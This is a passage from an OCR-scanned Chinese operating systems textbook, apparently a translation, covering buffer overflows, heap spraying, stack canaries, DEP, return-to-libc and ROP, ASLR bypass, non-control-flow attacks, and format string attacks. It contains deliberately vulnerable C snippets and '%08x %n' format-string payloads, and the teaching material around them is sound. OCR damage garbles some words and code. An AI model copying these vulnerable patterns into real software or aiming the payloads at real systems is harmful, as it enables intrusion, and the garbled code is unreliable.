这 样 的 代码 就 是 俗称 的 shellcode， 即 使 它 不 产生 壳 。 

这 种 攻击 手段 不 仅 能 够 作用 于 使 用 gets 函 数 的 程序 (虽然 你 应 该 尽量 避免 使 用 这 个 函数 )， 也 可 以 
作用 于 任何 复制 缓冲 区 中 用 户 提 供 的 数据 但 没有 进行 边界 冲突 检查 的 程序 。 这 些 用 户 数 据 可 以 由 命令 行 
参数 、 环 境 字 符 串 、 通 过 网 络 连接 发 送 的 数据 或 从 用 户 文件 读 取 的 数据 组 成 。 有 很 多 函数 可 以 复制 或 移 
动 这 种 数据 ， 包 括 strcpy、memcpy、strcat 等 。 当 然 你 自己 写 的 移动 若干 字 节 到 缓冲 区 的 循环 操作 也 可 
能 受到 攻击 。 

如 果 攻 击 者 不 知道 准确 的 返回 地 址 呢 ? 通常 攻击 者 能 够 大 约 猜 到 shellcode 的 位 置 ， 但 是 并 不 准确 。 
在 这 样 的 条 件 下 ， 一 种 典型 的 方法 是 用 预先 设置 好 的 空 指令 滑行 区 (nop sled) 来 增加 漏洞 被 成 功利 用 
的 可 能 性 :“ 一 系列 一 字 节 的 无 操作 的 指令 ”移动 到 “预先 设置 好 的 空 指令 滑行 区 ”后 边 。 只 要 代码 执 
行 到 这 个 空 指令 滑行 区 的 某 处 ，shellcode 最 终 都 会 运行 。 空 指令 滑行 区 在 栈 中 运行 ， 也 在 堆 中 运行 。 在 
堆 中 ， 攻 击 者 通常 通过 在 堆 中 放置 空 指令 滑行 区 和 shellcode 来 提高 成 功率 。 举 个 例子 ， 在 浏览 器 中 ， 恶 
意 的 JavaScript 代 码 会 分 配 尽 可 能 多 的 内 存 ， 并 且 用 很 长 的 空 指令 请 行 区 和 少量 的 shellcode 来 填充 它 。 然 
后 ， 如 果 攻 击 者 设法 转移 控制 流 到 一 个 随机 的 堆 地 址 ， 他 就 有 可 能 命中 空 指令 滑行 区 的 地 址 。 这 种 技术 
被 称 为 堆 喷射 。 

1. 栈 金 丝 省 保护 

一 种 常用 的 防御 上 述 攻击 的 方法 是 使 用 栈 金 丝 雀 保护。 这 个 名 字 来 源 于 采矿 业 。 在 矿井 中 工作 是 很 
危险 的 ， 一氧化碳 等 有 毒气 体 可 能 会 聚集 并 使 矿工 中 毒 。 一 氧化 碳 是 无 味 的 ， 矿 工 无 法 察觉 。 过 去 的 做 
法 是 矿工 把 金 丝 雀 带 入 矿井 中 作为 早期 的 预警 系统 。 有 毒气 体 增多 时 ， 在 主人 受到 伤害 之 前 ， 金 丝 雀 会 
先 被 毒 死 。 如 果 你 的 鸟 死 了 ， 那 么 有 可 能 是 时 候 赶快 离开 矿井 了 。 

现代 计算 机 系统 仍然 使 用 (数字 ) 金 丝 省 作为 早期 的 报警 系统 。 这 个 想法 非常 简单 。 在 程序 调用 函 
数 的 地 方 ， 编 译 器 在 栈 中 插入 代码 来 保存 一 个 随机 的 金 丝 省 值 ， 就 在 返回 地 址 之 下 。 从 调用 返回 时 ， 编 
译 器 插入 代码 来 检测 这 个 金 丝 害 值 ， 如 果 这 个 值 变 了 ， 就 是 出 错 了 。 在 这 样 的 情况 下 ， 最 好 是 停止 运行 
并 处 理 故 障 而 不 是 继续 运行 程序 。 

2. BRE AE 

金 丝 省 在 对 抗 上 述 攻击 时 是 有 效 的 ， 但 仍 有 许多 缓冲 区 溢出 可 能 发 生 。 例 如 ， 考 虑 图 9-22 中 的 代码 
片段 。 它 使 用 了 两 个 函数 。strcpy 是 C 语 言 函 数 库 中 复制 字符 串 到 缓冲 区 中 的 函数 ，strlen 用 于 确定 字符 
串 的 长 度 。 





01. void A (char *date) { 
int len; 
char B [128]; 
char logMsg [256]; 


strcpy (logMsg, date); /* 首先 将 日 期 字符 串 复制 到 日 志 信息 中 %/ 


len = strlen (date); /* 统计 日 期 字符 串 用 了 多 少 个 字符 */ 

gets (B); 上 证 现在 得 到 实际 信息 */ 

strcpy (logMsg+len, B); ”必然 后 将 实际 信息 复制 到 日 志 信 息 中 日 期 之 后 的 位 置 */ 
writeLog (logMsg); * 最 终 将 日 志 信息 写 回 硬盘 */ 





图 9-22 跳 过 栈 金 丝 八 : 通过 修改 ln， 攻击 能 够 绕 过 金 丝 雀 并 直接 修改 返回 地 址 


在 上 面 的 例子 中 ， 函 数 A 从 标准 输入 中 读 取 日 志 信息 ， 但 是 这 次 它 明 确 地 使 用 当前 日 期 来 做 准备 工 
作 (作为 函数 A 的 字符 串 参数 ) 。 首 先 ， 将 日 期 复制 到 日 志 信息 中 (第 6 行 )。 日 期 字符 串 可 能 有 不 同 的 长 
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度 ， 这 取决 于 这 一 天 具体 是 哪个 月 的 星期 几 ， 例 如 ， 星 期 五 有 5 个 字母 ， 而 星期 六 有 6 个 字母 ， 对 于 月 份 
而 言 也 是 一 样 的 。 所 以 ， 接 下 来 要 做 的 是 统计 出 日 期 字符 串 的 字符 数 (第 7 行 )。 然 后 获取 用 户 输入 (第 
8 行 ) 并 将 它 复制 到 日 志 信息 中 日 期 字符 串 之 后 的 位 置 。 实 现 的 方法 是 ， 通 过 指定 复制 地 址 为 日 志 信 息 
起 始 地 址 加 上 日 期 字符 串 的 长 度 (第 9 行 )。 最 终 像 之 前 一 样 将 日 志 写 入 硬盘 。 

让 我 们 假设 系统 使 用 栈 金 丝 誉 保护 ， 那 么 怎样 才能 改变 返回 地 址 ? 处 理 手 段 是 当 攻击 者 将 缓冲 区 B 
溢出 时 ， 他 不 会 直接 去 命中 返回 地 址 。 相 反 ， 他 修改 栈 中 在 返回 地 址 上 面 的 变量 len。 在 第 9 行 中 ，len 作 
为 偏 移 量 来 决定 缓冲 区 B 中 的 内 容 将 被 写 在 哪里 。 程 序 员 的 想法 是 仅仅 跳 过 日 期 字符 串 ， 但 是 由 于 攻击 
者 控制 了 len 变 量 ， 因 此 可 以 使 用 它 来 跳 过 金 丝 省 并且 重 写 返回 地 址 。 

此 外 ,缓冲 区 溢出 并 不 仅 限 于 返回 地 址 ， 通 过 溢出 可 以 触 碰 的 函数 指针 也 是 可 以 被 利用 的 。 函 数 指 
针 就 像 平 常 的 指针 一 样 ， 只 是 它 指 向 函数 而 非 数 据 。 例 如 ，C 和 C++ 人 允许 程序 员 申 明 变 量 f 作 为 指向 函数 
的 指针 ， 这 个 函数 有 一 个 字符 串 参数 ， 返 回 为 空 ， 如 下 所 示 : 

void (*f)(char*); 
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征 ， 因 此 我 们 可 以 写 f = A 并 在 程序 中 使 用 f 来 代替 A。 函 数 指针 方面 的 细节 超出 了 本 书 范围 ， 但 是 函数 指 
针 在 操作 系统 中 相当 常见 。 现 在 假设 攻击 者 试图 重 写 一 个 函数 指针 。 在 函数 使 用 函数 指针 的 时 候 ， 它 就 
会 调用 攻击 者 风 入 的 代码 。 为 了 成 功利 用 该 漏洞 ， 函 数 指针 其 至 不 需要 在 栈 上 。 堆 上 的 指针 函数 也 同样 
可 以 被 利用 。 只 要 攻击 者 能 够 改变 函数 指针 的 值 或 返回 地 址 到 包含 攻击 者 代码 的 缓存 区 ， 他 就 能 改变 程 
序 的 控制 流 。 

3. 数据 执行 保护 

也 许 现在 你 会 惊 呼 :“ 等 一 下 ! 问题 的 真正 根源 不 是 攻击 者 能 够 覆盖 函数 指针 和 返回 地 址 ， 而 是 他 
可 以 注入 代码 并 执行 。 为 什么 不 禁止 在 堆 和 堆栈 上 执行 字 节 ? ”如 果 是 这 样 ， 你 就 顿悟 了 。 然 而 ， 我 们 
很 快 就 会 看 到 ， 顿 悟 也 不 能 阻止 所 有 的 缓冲 区 溢出 攻击 。 不 过 这 个 想法 还 是 不 错 的 。 如 果 攻 击 者 提供 的 
字 节 不 能 作为 合法 代码 来 执行 ， 代 码 注入 攻击 就 会 失效 。 

现代 CPU 有 一 个 被 人 们 称 为 NX 位 的 功能 ，NX 代 表 不 执行 。 它 对 于 区 分 数据 段 ( 堆 、 栈 、 变 量 和 全 
局 变量 ) 和 文本 段 (包含 代码 ) 是 非常 有 用 的 。 具 体 来 说 ,许多 现代 操作 系统 试图 确保 数据 段 是 可 写 的 ， 
但 不 可 执行 ， 并且 文 本 段 是 可 执行 的 ， 但 不 可 写 。 这 个 策略 在 OpenBSD 上 被 称 为 W^X (W 异 或 X)。 它 
表示 内 存 是 可 写 的 或 可 执行 的 ， 但 不 是 两 者 都 可 以 。Mac OS X、Linux 和 Windows 有 类 似 的 保护 方案 。 
该 安全 措施 的 通用 名 称 是 DEP (数据 执行 保护 )。 有 些 硬件 不 支持 NX 位 ， 在 这 种 情况 下 ，DEP 仍 然 工 作 ， 
但 执行 发 生 在 软件 中 。 

DEP 可 以 防止 迄今 为 止 讨 论 的 所 有 攻击 。 攻 击 者 可 以 在 进程 中 嵌入 尽 可 能 多 的 shellcode。 然 而 ， 除 
非 他 能 够 使 内 存 可 执行 ， 否 则 就 没有 办 法 运行 它们 。 

4. 代码 重用 攻击 

DEP 使 得 在 数据 区 域 中 执行 代码 是 不 可 能 的 ， 栈 金 丝 害 使 其 更 难 (但 不 是 不 可 能 ) 改写 返回 地 址 和 
函数 指针 。 不 幸 的 是 ， 这 并 不 是 故事 的 结局 ， 因 为 攻击 者 也 会 得 到 启发 一 一 已 经 有 大 量 的 二 进 制 数据 在 
那里 了 ， 为 什么 还 要 人 嵌入 代码 ? 换言之 ， 攻 击 者 不 需要 引入 新 的 代码 ， 只 需 基 于 二 进 制 文件 和 库 中 现 有 
的 函数 和 指令 构造 必要 的 功能 。 我 们 先 来 看 看 最 简单 的 攻击 返回 libe， 然 后 讨论 更 复杂 但 非常 流行 的 返 
回 导 向 编程 技术 。 

假设 图 9-22 的 缓冲 区 溢出 漏洞 已 经 覆盖 当前 函数 的 返回 地 址 , 但 不 能 执行 攻击 者 在 栈 中 提供 的 代码 。 
问题 是 ， 它 能 返回 到 别 的 地 方 吗 ? 答案 当然 是 可 以 。 几 乎 所 有 的 C 程 序 都 链接 libc 库 ， 这 个 库 包 含 大 部 分 
C 程 序 所 需 的 关键 函数 。system 函 数 是 常用 的 关键 函数 之 一 ， 会 接收 字符 串 作为 输入 ， 并 将 其 传 入 shell 
程序 中 执行 。 通 过 使 用 system 函 数 ， 攻 击 者 能 执行 任何 它 想 执行 的 程序 。 所 以 ， 攻 击 者 仅仅 需要 在 栈 上 
放置 一 个 包含 命令 的 字符 串 代 替 执 行 shellcode， 并 通过 返回 地 址 来 转移 控制 至 system 函 数 。 

这 种 攻击 方式 就 是 人 们 所 熟知 的 返回 libe 攻 击 ， 并 且 有 多 个 变种 。system 不 是 攻击 者 唯一 感 兴趣 的 
函数 。 例 如 ， 攻 击 者 可 以 使 用 mprotect 函 数 来 让 部 分 数据 段 可 执行 。 此 外 ， 除 了 显 式 跳 转 到 libc 函 数 ， 也 
存在 一 些 隐 式 攻击 方式 。 在 Linux 中 ， 攻 击 者 可 以 返回 PLT (过 程 链接 表 )。PLT 是 一 个 使 动态 链接 更 容 
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易 的 结构 ， 并 且 包 含 执行 时 依次 调用 动态 链接 函数 的 代码 段 ， 返 回 此 代码 然后 间接 执行 库 函 数 。 

返回 导向 编程 (ROP) 的 概念 是 将 程序 代码 重用 到 极致 的 想法 。 利 用 返回 导向 编程 ， 攻 击 者 可 以 返 
回 到 文本 段 中 的 任何 指令 而 不 仅仅 是 返回 库 函 数 的 入 口 地 址 。 例 如 ， 他 可 以 使 代码 从 一 个 函数 中 间 执 行 ， 
而 不 是 从 函数 的 开始 。 代 码 会 在 这 个 点 上 开始 执行 ， 一 次 一 个 指令 。 在 少数 指令 执行 过 后 ， 会 遇 到 另 一 
个 返回 指令 。 现 在 ， 我 们 再 次 问 同样 的 问题 : 我 们 能 返回 哪里 ? 由 于 攻击 者 对 堆栈 有 控制 权 ， 因 此 他 可 
以 再 次 使 代码 返回 他 想 要 的 任何 地 方 ， 是 的 ， 当 他 第 一 次 进行 攻击 后 ， 他 可 以 无 限 次 地 进行 这 样 的 攻击 。 

所 以 ， 返 回 导 向 编程 的 诀窍 是 寻找 一 系列 可 以 满足 以 下 两 个 条 件 的 片段 代码 : (1) 有 用 ; (2) 以 
返回 指令 结束 。 攻 击 者 可 以 通过 堆栈 上 的 返回 地 址 将 这 些 序列 串 在 一 起 。 单 独 的 代码 片段 被 称 为 小 工具 
(gadget) 。 通 常 ， 它 们 具有 非常 有 限 的 功能 ， 如 添加 两 个 寄存 器 、 将 值 从 内 存 加 载 到 寄存 器 或 将 值 推 到 
堆栈 上 。 换 名 话说， 小 工具 的 集合 可 以 被 看 作 一 个 非常 奇怪 的 指令 集 ， 攻 击 者 可 以 利用 栈 的 建立 随意 巧 
妙 地 操纵 功能 。 同 时 ， 堆 栈 指 针 也 可 以 被 看 作 稍 显 奇 怪 的 程序 计数 器 ， 并 且 在 提供 着 相应 的 服务 。 


堆栈 





小 工具 示例 : 
小 工具 A 
。 将 操作 数 弹 出 栈 并 存 和 人 寄存 器 1 
。 如 果 是 负 值 ， 则 跳 转 到 错误 处 理 程 序 
。 否则 返回 
小 工具 B 
。 将 操作 数 弹 出 栈 并 存 人 寄存 器 2 


小 工具 C 
(功能 Z 的 一 部 分 ) 


。 返 回 
小 工具 C 
。 将 寄存 器 1 乘 以 4 
文本 段 。 将 寄存 器 1 推 上 堆栈 ; 
* 将 寄存 器 2 与 栈 顶 的 值 相 加 并 将 结果 
存 人 寄存 器 2 





小 工具 A 
(功能 X 的 一 部 分 ) 





a) b) 
图 9-23 返回 导向 编程 ; 链接 小 工具 


图 9-23a 是 通过 堆栈 的 返回 地 址 将 小 工具 链接 起 来 的 一 个 例子 。 这 些小 工具 是 以 返回 指令 结束 的 较 
短 代码 段 ， 返 回 指令 将 弹出 地 址 返回 堆栈 并 继续 执行 。 在 这 种 情况 下 ， 攻 击 者 首先 返回 小 工具 A 中 的 一 
些 功能 X， 然 后 是 小 工具 B 中 的 一 些 功能 Y， 等 等 。 从 已 有 的 二 进 制 代码 中 收集 小 工具 是 攻击 者 的 工作 ， 
因为 他 并 没有 创造 自己 的 小 工具 。 使 用 这 些小 工具 时 效果 并 不 是 非常 理想 ， 但 是 已 经 足够 。 例 如 ， 图 9-23b 
表明 小 工具 A 在 指令 序列 中 作为 检查 的 部 分 ， 虽 然 攻 击 者 并 不 在 乎 检查 ， 但 是 由 于 它 存 在 ， 他 就 必须 接 
受 。 对 于 大 多 数 的 意图 ， 它 可 能 足以 阻止 任何 负数 进入 寄存 器 1。 接 下 来 小 工具 弹出 堆栈 中 的 任意 值 到 
寄存 器 2， 第 三 步 用 寄存 器 1 乘 以 4， 推 上 堆栈 并 用 寄存 器 2 与 之 相 加 。 在 上 述 过 程 中 ， 攻 击 者 使 用 这 三 个 
小 工具 生成 的 新 工具 来 计算 整数 数组 中 元 素 的 地 址 。 数 组 中 的 索引 由 堆栈 上 的 第 一 个 数据 值 提供 ， 而 数 
组 的 基地 址 应 在 第 二 个 数据 值 中 。 

返回 导向 编程 看 起 来 可 能 非常 复杂 。 但 和 以 往 一 样 ， 人 们 已 经 开发 出 尽 可 能 自动 化 的 工具 ， 如 小 工 
具 收 割 机 ， 甚 至 还 有 ROP 编 译 器 。 目 前 ， 返 回 导向 编程 是 最 重要 的 攻击 技术 之 一 。 

5. 地 址 空间 布局 随机 化 

还 有 一 个 阻止 这 些 攻击 的 方法 。 除 了 修改 返回 地 址 和 注入 一 些 (ROP) 程序 ， 攻 击 者 应 该 能 够 返回 
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准确 的 地 址 一 一 使 用 ROP 时 空 指令 滑行 区 是 不 可 行 的 。 如 果 这 些 地 址 是 固定 的 那 就 很 容易 ， 可 是 如 果 不 
是 呢 ? 地 址 空间 布局 随机 化 (ASLR) 旨 在 随机 化 程序 每 次 运行 时 所 用 的 函数 和 数据 的 地 址 。 这 样 的 结 
果 就 是 让 攻击 者 更 加 难以 破解 系统 。ALSR 尤 其 经 常 将 初始 堆栈 和 库 的 位 置 进行 随机 化 。 

与 金 丝 甜 和 DEP 相 似 ， 许 多 现代 操作 系统 都 支持 ASLR， 但 往往 使 用 不 同 的 粒度 。 它 们 中 大 部 分 提 
供给 用 户 应 用 程序 ， 只 有 很 少 一 部 分 将 它 应 用 在 系统 内 核 中 (Giuffrida $A, 2012)。 这 三 种 保护 机 制 
的 合力 显著 提高 了 攻击 者 入 侵 的 门 榄 。 只 是 跳 转 到 和 典 入 代码 甚至 一 些 内 存 中 已 有 的 函数 已 经 很 难 奏效 。 
它们 共同 构成 了 现代 操作 系统 的 重要 防线 。 它 们 的 突出 优点 之 一 是 以 非常 合理 的 性 能 成 本 来 提供 保护 。 

6. 绕 过 ASLR 

即使 有 这 三 种 防御 措施 ， 攻 击 者 还 是 可 以 攻击 系统 。ASLR 有 几 个 弱点 ， 入 侵 者 可 以 借 此 绕 过 它 。 
第 一 个 弱点 是 ASLR 的 随机 性 不 够 强 。ASLR 的 许多 实现 中 仍然 有 一 些 在 固定 地 址 的 代码 。 再 者 ， 即 使 一 
个 片段 被 随机 化 了 ， 该 随机 化 也 可 能 很 薄弱 ， 攻 击 者 可 以 强行 破解 它 。 例 如 ， 在 32 位 系统 中 ， 因 为 不 能 
随机 化 栈 中 的 al 位 ， 所 以 焙 将 受到 限制 。 为 了 使 该 栈 像 正 常 的 栈 一 样 向 下 扩展 工作 ， 随 机 化 最 低 有 效 位 
就 不 是 一 个 合理 的 选择 。 

一 种 更 重要 的 对 抗 ASLR 的 攻击 是 通过 内 存 泄漏 形成 的 。 在 这 种 情况 下 ， 攻 击 者 利用 漏洞 不 是 为 了 
直接 控制 程序 ， 而 是 泄露 关于 内 存 布局 的 信息 ， 他 可 以 利用 这 些 信 息 作 为 第 二 个 攻击 漏洞 。 作 为 一 个 简 
单 的 例子 ， 考 虑 下 面 的 代码 : 

01. void C() { 

02. int index; 

03. _ int prime [16] = { 1,2,3,5,7,11,13,17,19,23,29,31 ,37,41,43,47 }; 

04. printf ("Which prime number between would you like to see?"); 

05. index = read_user_input (); 

06. printf ("Prime number %d is: %d\n", index, prime[index]); 

07. } 


该 代码 包含 了 一 个 对 read_user_input 的 调用 ， 它 并 不 是 标准 C 语 言 库 的 部 分 。 我 们 假设 它 存在 并 会 
返回 用 户 在 命令 行 中 输入 的 一 个 整数 。 同 时 我 们 也 假设 它 没有 任何 错误 。 即 使 这 样 ， 这 有 段 代码 还 是 很 容 
易 泄露 信息 。 我 们 需要 做 的 就 是 提供 一 个 大 于 15 或 者 小 于 0 的 索引 。 只 要 程序 不 检查 这 个 索引 ， 它 就 将 
返回 任何 内 存 中 的 整数 。 

函数 地 址 对 于 攻击 而 言 是 十 分 重要 的 。 原 因 是 即使 库 装载 的 位 置 是 随机 的 ， 但 是 每 个 函数 位 置 的 相 
对 偏 移 是 固定 的 。 如 果 你 知道 一 个 函数 ， 你 就 能 找到 所 有 函数 。 即 使 不 是 这 样 的 情况 ， 就 像 Snow 等 人 
(2013) 展示 的 那样 ， 只 要 有 一 段 代码 地 址 ， 也 是 非常 容易 获取 其 他 函数 的 位 置 的 。 

7. 非 控 制 流转 向 攻击 

目前 ， 我们 已 经 考虑 了 针对 程序 控制 流 方面 的 攻击 : 修改 函数 指针 和 返回 地 址 。 攻 击 者 的 目标 总 是 
让 程序 执行 新 的 功能 ， 即 使 该 功能 已 经 存在 于 二 进 制 代 码 中 。 然 而 这 不 是 唯一 的 攻击 途径 。 数 据 本 身 就 
是 吸引 攻击 者 的 一 个 有 趣 目标 ， 如 下 面 这 段 伪 代 码 : 

01. void A() { 

02. int authorized; 

03. char name [128]; 

04. authorized = check_credentials (...); /* 攻击 者 未 被 授权 ， 所 以 返回 0 */ 

05. printf ("What is your name?\n"); 

06. gets (name); 

07. if (authorized != 0) { 


08. printf ("Welcome %s, here is all our secret data\n", name) 
09. 个 … 显 示 绝 密 数 据 … */ 
10. }else 


Ty printf ("Sorry %s, but you are not authorized.\n"); 
12. } 
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该 代码 的 目的 是 权限 检查 。 只 有 拥有 正确 权限 的 用 户 才 可 以 查看 绝密 数据 。 国 数 check_credentials 并 不 
是 C 语 言 库 中 的 函数 ， 但 是 我 们 假设 它 存在 于 程序 中 并 且 不 包含 任何 错误 。 现 在 假设 攻击 者 输入 129 个 字 
符 。 就 像 之 前 的 例子 一 样 ， 缓 存 区 将 会 溢出 ， 但 是 它 不 会 修改 返回 地 址 。 不 过 ， 攻 击 者 已 经 修改 了 
authorized 变 量 的 值 ， 并 赋 给 它 一 个 非 0 值 。 程 序 不 会 崩溃 而 且 不 执行 任何 攻击 者 的 代码 ， 但 是 会 将 绝密 
数据 泄露 给 未 授权 用 户 。 

8. 缓冲 区 溢出 一 一 仍 未 到 达 终 点 

缓冲 区 溢出 是 攻击 者 使 用 的 最 古老 、 最 重要 的 内 存 泄 漏 技术 之 一 。 尽 管 20 多 年 来 出 现 了 很 多 事件 和 
防御 技术 (我们 只 关注 最 重要 的 一 些 ) ， 但 看 起 来 摆脱 这 一 问题 是 不 可 能 的 (Van der Veen, 2012), 一 
大 部 分 安全 问题 都 是 由 这 个 甫 症 造 成 的 ， 并 且 修 复 它 们 是 非常 困难 的 ， 因 为 很 多 C 语 言 程序 不 检查 内 存 
溢出 。 

军备 竞赛 从 来 不 会 结束 。 世 界 各 地 的 研究 者 都 在 研究 新 的 防御 手段 。 在 这 些 防御 手段 中 ， 有 的 针对 
二 进 制 文件 ， 有 的 针对 C 语 言 和 C++ 编译 器 的 安全 扩展 。 但 需要 指出 的 是 ， 攻 击 者 同样 在 提升 他 们 的 攻 
击 手 段 。 在 本 节 中 ， 我 们 尝试 对 一 些 重要 技术 进行 概述 ， 但 是 同样 的 想法 也 会 有 许多 变化 。 我 们 相当 确 
定 的 是 ， 在 本 书 的 下 一 版 中 ， 这 一 节 仍 会 包含 相关 内 容 (并 有 可 能 会 更 长 ) 。 


9.7.2 格式 化 字符 串 攻击 

接 下 来 介绍 的 攻击 手段 同样 属于 内 存 错误 类 型 ， 但 是 本 质 有 很 大 的 不 同 。 一 些 程序 员 不 喜欢 打字 ， 
即使 他 们 是 杰出 的 打字 员 。 他 们 在 想 ， 在 rc 明显 能 表达 相同 的 意思 并 且 能 省 去 13 次 键盘 项 击 的 前 提 下 ， 
为 什么 还 要 将 一 个 变量 命名 为 reference_count 呢 ?这 种 对 键盘 打字 的 厌烦 有 时 会 导致 下 述 灾难 性 的 错误 。 

考虑 下 面 这 段 C 程 序 代码 ， 它 打印 程序 中 传统 的 欢迎 内 容 : 

char *s="Hello World"; 

printf("%s", s); 

在 该 程序 中 , 声明 字符 串 变 量 s 并 用 字符 串 Hello World 对 其 进行 初始 化 , 用 零 字 节 代 表 字 符 串 的 末尾 。 
函数 printf 有 两 个 参数 ， 格 式 化 字符 串 “%s” 告 诉 它 按 何 种 格式 打印 字符 串 ， 第 二 个 参数 表示 该 字符 串 的 
地 址 。 在 执行 时 ， 这 段 代码 在 屏幕 上 打印 该 字符 串 (无 论 标 准 输出 在 哪 )。 它 是 正确 且 没 有 漏洞 的 。 

但 是 假设 程序 员 偷懒 并 且 将 上 述 输入 改 为 : 

char *s="Hello World"; 

printf(s); 

printf 的 调用 被 允许 ， 因 为 printf 函 数 有 数量 可 变 的 参数 ， 这 些 参 数 的 第 一 个 必须 是 格式 化 字符 串 ， 
但 是 不 包含 任何 格式 声明 信息 (例如 “%s”) 的 字符 串 也 是 合法 的 。 尽 管 第 二 个 版 本 不 是 很 好 的 编程 习 
惯 , 但 它 是 被 允许 且 能 够 工作 的 。 最 重要 的 是 这 样 节省 了 五 个 字符 的 键盘 输入 ， 显 然 是 一 个 大 胜利 。 

6 个 月 后 ， 其 他 程序 员 根 据 新 需求 来 修改 代码 ， 这 次 首先 要 询问 用 户 的 名 字 ， 然 后 根据 名 字 向 用 户 
发 出 问候 。 在 仔细 研究 代码 之 后 ， 他 稍微 改变 了 一 下 ， 像 这 样 : 


char s[100], g[100] = "Hello "; t Esg; 初始 化 g */ 
gets(s); 上 从 键盘 读 取 字 符 串 并 保存 到 s */ 
streat(g, s); /* 把 s 连 接 到 g 的 后 面 4/ 


printf(g); /* $TEllg */ 

现在 它 读 取 一 个 字符 串 并 把 值 赋 给 变量 s， 并 且 将 它 与 已 经 初始 化 的 字符 串 g 进 行 字符 串 连接 ， 最 后 
输出 g 中 的 消息 。 这 段 程序 依然 运行 正常 ， 到 现在 为 止 一 切 安 好 (除了 程序 中 使 用 了 易 受 到 缓冲 区 溢出 
攻击 的 gets 国 数 ， 尽 管 这 样 ，gets 函 数 仍然 流行 ) 。 

然而 ， 内 行 的 用 户 在 看 到 这 段 代 码 后 会 很 快意 识 到 从 键盘 输入 接受 的 不 仅仅 是 一 个 字符 串 ， 而 且 是 
格式 化 字符 串 ， 这 样 所 有 被 printf 人 允许 的 格式 化 字符 串 都 将 奏效 。 虽 然 大 多 数 格式 标识 如 “%s”( 用 于 打 
印字 符 串 ) 和 “%d”( 用 于 打印 十 进 制 整数 ) 可 以 对 输出 进行 格式 化 ， 但 有 一 些 格式 标示 是 特殊 的 。 例 
如 ,“%n” 不 打印 任何 东西 。 它 记录 自己 在 当前 字符 串 中 所 处 的 位 置 以 及 有 多 少 应 该 已 经 输出 的 字符 ， 
以 供 下 一 个 printf 的 参数 使 用 。 

下 面 是 使 用 “%n” 的 一 个 示例 程序 : 


368 ran; 


int main(int argc, char *argv[]) 


{ 


int i=0; 
printf("Hello Y%nwor Id\n", &i); I* %n 存 储 到 i 中 */ 
printf("i=%d\n", i); 广 现在 i 是 6 */ 


} 

该 程序 被 编译 并 运行 时 ， 它 在 屏幕 上 输出 的 是 : 

Hello world 

i=6 
注意 到 变量 i 的 值 已 经 被 printf 的 调用 所 修改 ， 这 个 变化 并 不 是 对 所 有 人 都 很 明显 。 打 印 一 个 格式 化 字符 
串 能 让 一 个 单词 或 者 许多 单词 存储 于 内 存 中 ， 该 特性 很 难 用 得 上 。printft 的 这 个 特点 是 个 好 想法 吗 ? 绝 
对 不 是 ， 但 是 它 在 当时 是 很 方便 的 。 许 多 软件 漏洞 都 是 这 样 开始 的 。 

就 像 之 前 的 例子 中 ， 修 改 代码 的 程序 员 意 外 地 人 允许 程序 的 用 户 (无 意 中 ) 输入 一 个 格式 化 字符 串 。 
因为 输入 格式 化 字符 串 可 以 覆盖 内 存 ， 所 以 现在 我 们 便 得 到 了 进行 攻击 所 需要 的 工具 ， 它 可 以 修改 栈 中 
printf 函数 的 返回 地 址 并 可 以 跳 转 到 其 他 地 方 ， 例 如 一 个 新 进入 的 格式 化 字符 串 。 这 种 方法 称 为 格式 化 
字符 串 攻击 。 

要 执行 格式 化 字符 串 攻 击 并 不 容易 。 函 数 printf 的 字符 数 会 存在 哪儿 ? 就 像 上 面 展 示 的 例子 中 ， 该 
位 置 在 格式 化 字符 串 紧 接着 的 参数 地 址 上 。 但 是 在 有 漏洞 的 代码 中 ， 攻 击 者 只 能 提供 一 个 字符 串 
(printf 不 提供 第 二 个 参数 )。 实 际 上 会 发 生 的 是 ，printf 函 数 会 假定 有 第 二 个 参数 。 它 会 获取 栈 中 的 下 一 
个 值 并 进行 使 用 。 攻 击 者 也 让 printf 使 用 栈 中 的 下 一 个 值 ， 例 如 提供 如 下 的 格式 化 字符 串 ; 

"%08x %n" 


%08x 代 表 printf 将 会 打印 下 一 个 参数 作为 8 位 的 十 六 进 制 数 。 
所 以 若 该 值 是 1， 就 会 打印 0000001。 换 句 话 说 ， 使 用 该 格式 
化 字符 串 时 ，printf 将 会 简单 地 假设 栈 中 的 下 一 个 值 是 它 该 打 
印 的 32 位 数字 ， 在 那 之 后 的 值 是 它 应 该 存储 打印 字符 串 的 数 
量 的 地 址 。 在 本 例 中 共有 9 位 ， 其 中 8 位 用 来 表示 十 六 进 制 数 ， 
剩 下 一 位 是 空 。 假 设 它 提供 格式 化 字符 串 : 

"%08x %08x %n" 


在 这 个 例子 中 ，printf 将 存储 栈 上 的 第 三 个 格式 化 字符 串 提 供 

的 地 址 所 存 的 值 ， 等 等 。 这 是 给 攻击 者 提供 “在 任意 地 方 写 ” 

的 格式 化 字符 串 漏洞 的 关键 。 其 细节 超越 了 本 书 的 范围 ， 但 

基本 思路 是 攻击 者 确保 正确 的 目标 地 址 在 栈 上 。 这 要 比 你 想 

象 的 简单 。 例 如 我 们 之 前 提供 的 有 漏洞 的 代码 ， 字 符 串 g 也 

在 栈 中 ， 比 printf 的 栈 帧 的 地 址 更 高 〈 见 图 9-24) 。 让 我 们 假 printf 的 
设 字符 串 像 图 9-24 那 样 以 AAAA 开 始 ， 随 后 的 是 %0x， 最 后 栈 帧 | 
以 %0n 结 束 。 将 会 发 生 什么 ?如 果 攻 击 者 得 到 的 %0x 的 数量 

是 正确 的 ， 那 么 他 将 到 达 格式 化 字符 串 (存储 在 缓冲 区 B)。 图 9-24 格式 化 字符 串 攻击 。 得 到 %08x 的 


缓冲 区 B 





printf 的 第 一 个 参数 
(指向 格式 化 字符 串 ) 


换 句 话说 ，printf 将 使 用 格式 化 字符 串 的 前 4 个 字 节 作为 地 址 正确 数量 后 ， 攻 击 者 可 以 将 格式 
进行 写 信 。 因 此， 字符 A 的 ASCII 码 是 65 (十 六 进 制 是 0x41)， 化 字符 串 的 前 4 个 字符 作为 地 址 


它 将 会 把 结果 写 在 0x41414141， 但 是 攻击 者 也 可 以 指定 其 他 
地 址 。 当 然 它 必须 确保 打印 的 字符 串 的 数量 是 正确 的 (因为 这 是 要 被 写 入 目标 地 址 的 内 容 )。 实 际 上 会 
比 它 多 一 些 ， 但 不 会 多 很 多 。 如 果 在 任何 搜索 引擎 中 输入 “格式 字符 串 攻 击 ”， 你 会 发 现 很 多 关于 该 问 
题 的 信息 。 

一 旦 用 户 有 能 力 重 写 内 存 并 强制 跳 转 到 新 注入 的 代码 ， 代 码 就 拥有 了 被 攻击 程序 的 能 力 和 权限 。 如 
